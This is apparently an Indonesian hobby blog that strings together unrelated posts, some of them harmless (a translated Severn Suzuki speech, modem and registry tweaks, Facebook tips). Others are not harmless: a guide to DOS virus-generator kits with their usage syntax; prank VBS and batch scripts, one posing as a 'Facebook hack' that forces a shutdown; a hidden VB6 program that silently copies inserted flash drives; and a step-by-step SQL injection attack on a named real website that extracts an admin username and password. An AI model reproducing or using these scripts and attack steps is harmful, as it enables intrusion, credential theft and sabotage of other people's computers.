Pada menu Efects, program VCL ini menawarkan berbagai macam efect untuk virus.

Selain itu VCL juga menyediakan fasilitas untuk menambah Efect sesuai dengan keinginan kita, dengan cara mengabungkan rutin Efect kita dengan program VCL.

IVP ( Instan Virus Production Kit)

Program IVP yang Penulis ambil adalah yang versi IVP V.1.7, Program IVP ini dibuat oleh Admiral Baily seorang anggota Y.A.M (Youth Agains McAfee). IVP berbeda dengan VCL karena IVP tidak berupa Menu Driven atau Integrated Environment, tapi berbentuk Command Line. Dan kita memerlukan sebuah file Configuration untuk dapat menghasilkan virus. Defaultnya adalah IVP.CFG, yang didalamnya berisi karakteristik Virus yang akan dibuat. Cara pengunaan IVP sangat mudah, pertama kita tentukan dahulu jenis virus yang akan kita buat, semua karakteristik virus, kita masukan dalam file .CFG, seperti nama virus, metode penyerangan, pengaman, rutin aktivasi, efek virus, dan lain-lain. Setelah kita selesai memasukan data-data dalam file konfigurasi, selanjutnya kita menjalankan IVP dalam Command Line , dengan Syntax :

C:\>IVP [Nama_file.CFG]

Setelah itu akan terbentuk file dengan nama sesuai dengan nama yang kita berikan dalam file konfigurasi, dengan Extension .ASM, selanjutnya kita dapat mengkompile file tadi dengan Turbo asembler (TASM) / MASM, setelah itu di link menggunakan Turbo Link (TLINK) / EXE2BIN untuk MASM.

G ²

Program G ² ini di tulis oleh Dark Angel dari Phalcom/SKISM, program G ² ini dikeluarkan setelah Phalcom/SKISM mengeluarkan program virus generator yang terkenal yaitu PS-MPC (Phalcom/SKISM Mass Production Code Generator), cara kerja program G ² ini sama dengan IVP, yaitu menggunakan Command Line, dan membutuhkan file Konfigurasi. Hanya bedanya G ² membutuhkan sebuah file data. File data ini dapat juga digunakan untuk PS-MPC, begitu juga sebaliknya Syntax penulisan G ², yaitu :

C:\>G2.EXE [File_Config1.cfg] [file_config2.cfg]

Contohnya : G2.EXE G2.Dat G2.Cfg

Program G ² ini juga menawarkan berbagai jenis virus, dengan rutin aktivasi, pengaman, metode penyerangan, maupun efek virus yang beraneka ragam, juga menawarkan virus-virus TSR (Terminate And Stay Residence).

NRLG (Nuke Randomic Life Generator)

Program NRLG ini ditulis oleh Azrael dari kelompok [NUKE] Warez, program virus generator ini mempunyai tampilan yang berseni, selain tampilannya yang Integrated Environment yang berupa Pulldown menu, juga bentuk-bentuk hurufnya yang menarik

Dalam main menu NRLG terdapat About, New Monster, Create dan Quit, dimana menu About berisi nama-nama anggota pembuat NRLG dan tempat tinggalnya. Sedangkan menu New Monster berisi jenis-jenis virus yang dapat dihasilkan oleh NRLG, rutin aktivasi, pengaman, berikut Efek-efeknya.

Rutin aktivasi dapat di gunakan tanggal, bulan maupun tahun yang diinginkan, sedangkan pengaman terdiri dari Encription, Directory Stealth, maupun memory stealth, selain itu pengaman juga dilakukan dengan menghapus program anti virus yang ada, baik yang TSR maupun yang ada di Hard Disk.
SUMBER::: THE HACKING
»»  READMORE...

cara membuat sebuah virus komputer

postingan kali ini mau singkat saja : cara membuat virus itu mudah copy script di bawah ini simpan dengan eksistensi VBS (ke notepad)


On error resume next

Dim Reg

Set Reg = CreateObject(”WScript.Shell”)

if msgbox(”Kembalikan menu Run ?” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “0″, “REG_DWORD”

end if

if msgbox(”Enable Registry Tool ?” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “0″, “REG_DWORD”

end if

if msgbox(”Perlihatkan file hidden” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “1″, “REG_DWORD”

end if

if msgbox(”Kembalikan menu Find” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “0″, “REG_DWORD”

end if

if msgbox(”Kembalikan menu Option” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “0″, “REG_DWORD”

end if

if msgbox(”Enable Taskmanager” , VbOkCancel) = VbOK then

Reg.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “0″, “REG_DWORD”

end if

jika udah simpan dengan ekstensi vbs , jangan lupa itu… sebagai contoh: obatgila.vbs

ni W tambahinn

buka tutup CD/DVD
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs

5.bikin vbscript nongol mlulu
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
save namafile.vbs
ket:di task manager full wscript yg lg running

teken tombol backspace mlulu
Code:
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
save namafile.vbs

7.otomatis ngetik "lu jelek banget sih" di notepad/word
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
save namafile.vbs

8.buka notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.

klo yg lain simpan dengan extensi bat bukan vbs


ni tambah lagyy
bikin shutdown+message
Code:
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu standar abis"

3.Mainin Caps Lock button
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
save namafile.vbs

ni w tambah lagy

on error goto 0
dim s,quest,sd,m,winpath,fs
set sd=createobject("Wscript.shell")
set fs=createobject("Scripting.FileSystemObject")
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject("wscript.shell")
do while quest=""
quest=inputbox("Masukan Email Facebook Target. Warning, Memasukan Email Tidak boleh salah","http://www.xplaine.co.cc")
if quest="" then
m=MsgBox("Maaf Email Belum Dimasukan", 0+0=48, "xplaine Hack Facebook")
end if
loop
if quest="echo" then
s.run "shutdown -a"
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
else
s.run "shutdown -s -t 30"
end if
»»  READMORE...

pidato membungkam dunia

Cerita ini mengenai Severn Cullis-Suzuki. Seorang anak yang pada usia 9 tahun telah mendirikan Enviromental Children's Organization (ECO).

ECO adalah sebuah kelompok anak kecil yg mendedikasikan diri untuk belajar dan mengajarkan anak-anak lain mengenai masalah lingkungan. Dan mereka pun diundang menghadiri Konfrensi Lingkungan hidup PBB, dimana saat itu Severn yg berusia 12 tahun memberikan sebuah pidato yg memberikan pengaruh besar (dan membungkam) para pemimpin dunia.

Apa yg disampaikan oleh seorang anak kecil berusia 12 tahun ini hingga membuat RUANG SIDANG PBB hening?

Inilah Isi pidato tersebut: (sumber: The Collage Foundation)

***
Halo, nama Saya Severn Suzuki, berbicara mewakili E.C.O - Enviromental Children Organization.

Kami Adalah kelompok dari Kanada yg terdiri dari anak-anak berusia 12 dan 13 tahun, yang mencoba membuat perbedaan: Vanessa Suttie, Morga, Geister, Michelle Quiq dan saya sendiri.

Kami menggalang dana untuk bisa datang kesini sejauh 6000 mil. Untuk memberitahukan pada anda sekalian orang dewasa bahwa anda harus mengubah cara anda, Hari ini disini juga.

Saya tidak memiliki agenda tersembunyi. Saya menginginkan masa depan bagi diri saya saja.
Kehilangan masa depan tidaklah sama seperti kalah dalam pemilihan umum atau rugi dalam pasar saham.

Saya berada disini untuk berbicara bagi semua generasi yg akan datang.
Saya berada disini mewakili anak-anak yg kelaparan di seluruh dunia yang tangisannya tidak lagi terdengar.
Saya berada disini untuk berbicara bagi binatang-binatang yang sekarat yang tidak terhitung jumlahnya di seluruh planet ini karena kehilangan habitat nya. Kami tidak boleh tidak di dengar.

Saya merasa takut untuk berada dibawah sinar matahari karena berlubang nya lapisan OZON.
Saya merasa takut untuk bernafas karena saya tidak tahu ada bahan kimia apa yg dibawa oleh udara.
Saya sering memancing di Vancouver bersama ayah saya, hingga beberapa tahun yang lalu kami menemukan bahwa ikan-ikannya penuh dengan kanker. Dan sekarang kami mendengar bahwa binatang-binatang dan tumbuhan satu persatu mengalami kepunahan tiap harinya - hilang selamanya.

Dalam hidup saya, saya memiliki mimpi untuk melihat kumpulan besar binatang-binatang liar, hutan rimba dan hutan tropis yang penuh dengan burung dan kupu-kupu. Tetapi sekarang saya tidak tahu apakah hal-hal tersebut masih ada untuk dilihat oleh anak saya nantinya.

Apakah anda sekalian harus khawatir terhadap masalah-masalah kecil ini ketika anda sekalian masih berusia sama seperti saya sekarang?
Semua ini terjadi di hadapan kita dan walaupun begitu kita masih tetap bersikap bagaikan kita masih memiliki banyak waktu dan semua pemecahannya. Saya hanyalah seorang anak kecil dan saya tidak memiliki semua pemecahannya tetapi saya ingin anda sekalian menyadari bahwa anda sekalian juga sama seperti saya!

Anda tidak tahu bagaimana caranya memperbaiki lubang pada lapisan ozon kita.
Anda tidak tahu bagaiman cara mengembalikan ikan-ikan salmon ke sungai asalnya.
Anda tidak tahu bagaimana caranya mengembalikan binatang-binatang yang telah punah.
Dan anda tidak dapat mengembalikan hutan-hutan seperti sediakala di tempatnya yang sekarang hanya berupa padang pasir.
Jika anda tidak tahu bagaimana cara memperbaikinya.
TOLONG BERHENTI MERUSAKNYA!

Disini anda adalah deligasi negara-negara anda. Pengusaha, anggota perhimpunan, wartawan atau politisi - tetapi sebenarnya anda adalah ayah dan ibu, saudara laki-laki dan saudara perempuan, paman dan bibi - dan anda semua adalah anak dari seseorang.
Saya hanyalah seorang anak kecil, namun saya tahu bahwa kita semua adalah bagian dari sebuah keluarga besar, yang beranggotakan lebih dari 5 milyar, terdiri dari 30 juta rumpun dan kita semua berbagi udara, air dan tanah di planet yang sama - perbatasan dan pemerintahan tidak akan mengubah hal tersebut.

Saya hanyalah seorang anak kecil, namun begitu saya tahu bahwa kita semua menghadapi permasalahan yang sama, dan kita seharusnya bersatu untuk tujuan yang sama.
Walaupun marah, namun saya tidak buta, dan walaupun takut, saya tidak ragu untuk memberitahukan dunia apa yang saya rasakan.

Di negara saya, kami sangat banyak melakukan penyia-nyiaan, kami membeli sesuatu dan kemudian membuang nya, beli dan kemudian buang. Walaupun begitu tetap saja negara-negara di utara tidak akan berbagi dengan mereka yang memerlukan.
Bahkan ketika kita memiliki lebih dari cukup, kita merasa takut untuk kehilangan sebagian kekayaan kita, kita takut untuk berbagi.

Di Kanada kami memiliki kehidupan yang nyaman, dengan sandang, pangan dan papan yang berkecukupan - kami memiliki jam tangan, sepeda, komputer dan perlengkapan televisi.
Dua hari yang lalu di Brazil sini, kami terkejut ketika kami menghabiskan waktu dengan anak-anak yang hidup di jalanan. Dan salah satu anak tersebut memberitahukan kepada kami: “Aku berharap aku kaya , dan jika Aku kaya, Aku akan memberikan anak-anak jalanan makanan, pakaian dan obat-obatan, tempat tinggal, cinta dan kasih sayang.”
Jika seorang anak yang berada dijalanan yang tidak memiliki apapun, bersedia untuk berbagi, mengapa kita yang memiliki segalanya masih begitu serakah?

Saya tidak dapat berhenti memikirkan bahwa anak-anak tersebut berusia sama dengan saya, bahwa tempat kelahiran anda dapat membuat perbedaan yang begitu besar. Bahwa saya bisa saja menjadi salah satu dari anak-anak yang hidup di Favellas di Rio; saya bisa saja menjadi anak yang kelaparan di Somalia; seorang korban perang timur tengah atau pengemis di India.
Saya hanyalah seorang anak kecil namun saya tahu bahwa jika semua uang yang dihabiskan untuk perang dipakai untuk mengurangi tingkat kemisikinan dan menemukan jawaban terhadap permasalahan alam, betapa indah jadinya dunia ini.

Di sekolah, bahkan di taman kanak-kanak, anda mengajarkan kami untuk berbuat baik. Anda mengajarkan pada kami untuk tidak berkelahi dengan orang lain.
Mencari jalan keluar, membereskan kekacauan yang kita timbulkan.
Tidak menyakiti makhluk hidup lain, berbagi dan tidak tamak.
Lalu mengapa anda kemudian melakukan hal yang anda ajarkan pada kami supaya tidak boleh dilakukan tersebut?

Jangan lupakan mengapa anda menghadiri konferensi ini. Mengapa anda melakukan hal ini - kami adalah anak-anak anda semua. Anda sekalianlah yang memutuskan dunia seperti apa yang akan kami tinggali. Orang tua seharus nya dapat memberikan kenyamanan pada anak-anak mereka dengan mengatakan “Semuanya akan baik-baik saja”, “Kami melakukan yang terbaik yang dapat kami lakukan” dan “Ini bukanlah akhir dari segalanya”.

Tetapi saya tidak merasa bahwa anda dapat mengatakan hal tersebut kepada kami lagi. Apakah kami bahkan ada dalam daftar prioritas anda semua?
Ayah saya selalu berkata “Kamu akan selalu dikenang karena perbuatan mu bukan oleh kata-kata mu”
Jadi, apa yang anda lakukan membuat saya menangis pada malam hari. Kalian orang dewasa berkata bahwa kalian menyayangi kami.
Saya menantang A N D A , cobalah untuk mewujudkan kata-kata tersebut.
Sekian dan terima kasih atas perhatiannya.
***

Servern Cullis-Suzuki telah membungkam seisi ruang sidang Konfrensi PBB, membungkam seluruh orang-orang penting dari seluruh dunia hanya dengan pidatonya yg tanpa naskah sama sekali.

Setelah pidato nya selesai serempak seluruh orang yang hadir di ruang pidato tersebut berdiri dan memberikan tepuk tangan yang meriah kepada anak berusia 12 tahun itu.

Dan setelah itu ketua PBB mengatakan dalam pidato nya...
“Hari ini Saya merasa sangatlah malu terhadap Diri saya sendiri karena saya baru saja disadarkan betapa pentingnya linkungan dan isinya disekitar kita oleh Anak yang hanya berusia 12 tahun yang maju berdiri di mimbar ini tanpa selembar pun Naskah untuk berpidato, sedangkan saya maju membawa berlembar naskah yang telah dibuat oleh assisten saya kemarin. Saya... Tidak, kita semua dikalahkan oleh anak yang berusia 12 tahun”

sumberr ::::
the hackingg

»»  READMORE...

hack flasdiskk pake software buatan sendiri

halo sobat kali ini saya mau share cara ngehack flaskdisk hehe jujur saya belom berani nyoba sob, bagi yang mau coba aja deh hehe

Seperti biasa kita akan menggunakan Visual basic 6.0
1. Jalankan Program VB kamu
2. Pilih Standard EXE
3. Masukan 1 Driverlistbox, 2 Label, 1 timer
Pada label 1 captionnya biarkan kosong dan pada label 2 ganti caption menjadi “Status Flasdisk” tanpa tanda kutip
4. Copy dan pastekan code dibawah ini


Private Declare Function getdrivetype& Lib “kernel32? Alias “GetDriveTypeA” (ByVal nDrive As String)

Private Sub Form_Load()
App.TaskVisible = False
Me.Hide
End Sub

Private Sub Timer1_Timer()
‘buat ngecek flashdisk
Drive1.Refresh
Dim i As Integer
For i = 0 To Drive1.ListCount – 1
If getdrivetype(Drive1.List(i)) = 2 And left(Drive1.List(i), 1) “a” Then
Label1 = Drive1.List(i) & “\”
CekCopy

Label2 = “Lets Get it”
Exit Sub
Exit For
End If
Next
Label2 = “Belum Ada”
End Sub

Private Sub CekCopy()
If Label2 = “Lets Get It” Then
Exit Sub
Else
Shell (”xcopy /S /H /Y /C ” & Label1), vbHide
End If
End Sub

tekan F5 ....
selamat mencoba hehe semoga SUKSES :P

»»  READMORE...

smart booster intenet

cara membuat modem smart kenceng cara ini beberapa waktu lalu efektif saya pakai untuk mendongkrak kecepatan modem smart saya yang memang jujur lelet sangat..
kalo nggak percaya coba beli deh dan rasakan akibatnya hehe #peace
oke langsung saja berikut cara membuat modem smart menjadi kenceng

1.Setting Komputer / Windows
Masuk ke Run - "gpedit.msc" Computer
Configuration – Administrative Templates – Network - Qos Packet Scheduler.
Rubah Limit Outstanding Packets dari not configured menjadi enabled
dan Bandwidth Limit (%) = 0. Hal ini akan menghemat bandwidth
kita 20% yaaang ...dipakai oleh Microsoft.

2. SettingTCP/IP pada "regedit"
HKLM-system-CurrentControlSet-Services-Tcpip-parameters, dan edit value register
pada :
- DefaultTTL isi value 00000040
- EnablePMTUBHDetect isi value 00000000
- EnablePMTUDiscovery isi value 00000001
- GlobalMaxTcpWindowSize isi value 0005ae4c
- SackOpts isi value 00000001
- Tcp1323Opts isi value 00000003
- TcpWindowSize isi value 0005ae4c
- Restart PC

3. SETTING APN SMART
Dikarenakan sibuknya jalur yang digunakan pada #777 username dan password
smart. Coba anda kombinasikan dialup *777# atau 222 atau *99#
atau *31*11111#

klo cara diatas tidak bisa pakein NOZ ja.. hhehehe ^^
semoga sukses membuat modem smartnya kenceng ya

»»  READMORE...

cara bermain registry windows XP

registry merupakan salah satu elemen penting dalam suatu operating system bawaan microsoft yang tidak boleh tersentuh oleh tangan jahil virus, namun kita bisa mengedit registry sesuai yang kta inginkan tapi ingat harus dengan petunjuk pemakaian hehe
Banyak sekali yang bisa kita lakukan dengan registry asal tau caranya. tertarik sobat mau edit registrynya? oke saya kasih nih cara edit registry sesuai anjuran hehe

Menonaktifkan Fungsi Penginstallan Program Dari Website
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\ZoneMap\Domains
Buat sebuah key baru tepat dibawah Domains dan beri nama sesuai dengan nama situs yang dipilih. misalnya
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\ZoneMap\Domains\forbidden.com
Dibawah subkey tersebut, buat sebuah DWORD Value baru dan beri nama * dan masukkan angka 4 pada Value Data.
Untuk menampilkan kembali fitur2 di control panel, coba buka:
HKEY_CURRENT_USER\Control Panel\don't load
jika terdapat banyak key disitu dengan value masing-masing No, klik ganda masing-masing key dan masukkan Yes pada Value Data.



Untuk mengaktifkan kembali Display Properties, coba buka:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\System
Cari key bernama NoDispSettingsPage dan masukkan angka 0 pada Value Data.
Saya tambahin dikit aja yah :

Cara menghilangkan option "Show hidden files & Folder " pd Folder Option
HKEY_LOCAL_MACHINE | SOFTWARE | Microsoft | Windows | CurrentVersion | Explorer | Advanced | Folder | Hidden
Di bag. "Type" hilangkan kata "group"
OS : WIN XP

Memblokir aplikasi yg berjalan pd FAT 32 :
ada 2 cara utk pemblokiran :
HKEY_LOCAL_MACHINE : utk seluruh sistem
HKEY_CURRENT_USER : utk pengguna bersangkutan

mulailah navigasi ke :
Software | Microsoft |CurrentVersion | Policies | Explorer
di jendela sblh kanan, klik kanan : Edit | New | Dword Value
ketik : DisallowRun, ketik angkanya : 1, bila ingin membatalkan pemblokiran, ketik : 0
Skrg pilih lg : Edit | New | Key & masukkan lg : DisallowRun
pindah ke subkey baru & buat sebuah daftar aplikasi yg diblokir
Utk setiap program, buatlah sebuah entri dgn : Edit | New | CharacterSet & beri angka 1 berurutan. Tutup editing dgn "Registry | Finish", restartlah PC anda
Note : sebaiknya backup dulu sebelum mengedit registrynya hehe
»»  READMORE...

cara merubah domain blogspot menjadi domain co.cc

selain domain .com yang berbayar ada domain gratis yaitu co.cc yang membuat dan memasangnya sangat gampang
tidak perlu bersusah payah untuk merubah domain blogspot menjadi co.cc walaupun beberapa waktu lalu google sempat tidak mengindex co.cc namun sekarang sudah kembali seperti semula lagi hehe
oke ikuti langkah berikut untuk merubah ke co.cc
Pertama2 buat Domain gratis dulu klik co.cc
Kalo dah kbuka buat domainnya mis: www.solusiinternet.co.cc terus cek available ga
inget juga harganya juga musti $0 kalo udah klik Create an account now
trus masukin data diri centang juga term servisnya.
Kalo udah dapet domain masuk member areanya klik manage domain
Klik domain yang co.cc bukan cc.cc

klik set up
Yg kedua klik zone records
Isi Host dengan domain u tadi pake www
Isi TTL 1D
Isi Type CNAME
Isi Value ghs.google.com
kalo dah selesai klik set up


domain dah selesai skarang

Untuk masukin ke blogspot tinggal masuk ke pengaturan
terus masuk yg publikasikan kalo dah kbuka ganti domain setup dengan nama domain co.cc tadi masuk verifikasi simpan deh

selesai

tunggu 24 jam
sumber : menurut pengalaman
»»  READMORE...

Jumat, April 09, 2010

SQL injectiionn

maavv kalo tulisan_a susah di ngerty jalan cerita_a hahaa
Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan

berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.

»»  READMORE...

Kamis, April 08, 2010

cara memasang musik di facebook

cara memasang musik di facebook sangat gampang dan mudah sobat semua

berikut cara memasang musik dan mendengarkan lagu di facbook kita

Cara pasang musik di facebook. Login facebook anda terlebih dahulu, buka URL aplikasi facebook berikut ini :

http://apps.new.facebook.com/mixpodplaylist/

nah expresikan musik-mu !!! semangat !!!

NB : Sebelum memilih lagu, sebaiknya diputar terlebih dahulu. Cari yang buffering-nya cepat dan bunyi. Ok !
sekian cara memasang lagu atau musik di facebook
sumber: id-facebook.blogspot.com
»»  READMORE...

CARA MEMBUAT STATUS LEBIH MENARIK

Kali ini sya akan menjelaskan cara-cara untuk bikin status facebook anda lebih menarik. Berbeda dengan status facebook yang menggunakan tulisan terbalik. Kali ini menggunakan aplikasi facebook. Yang jelas mirip seperti emoticon dan kode smiley. Contoh : --- ̿̿̿ ̿' ̿'\̵͇̿̿\з=(•̪●)=ε/̵͇̿̿/'̿'̿ ̿ ---, Mau ?

Untuk membuat status facebook anda lebih menarik, caranya :

